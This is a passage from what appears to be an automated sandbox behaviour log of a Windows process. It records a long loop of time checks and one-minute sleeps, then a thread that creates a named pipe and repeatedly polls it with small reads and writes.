System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:01 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:02 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:02 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:02 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:02 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
For performance reasons, the remaining 1228 entries are omitted. The remaining entries can be found in glog.xml.

Thread 0xa34

3392

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\advapi32.dll, base_address = 0x774c0000	2	Fn
File	Create Pipe	pipe_name = \device\namedpipe\3128lacesomepipe, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, max_instances = 1	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
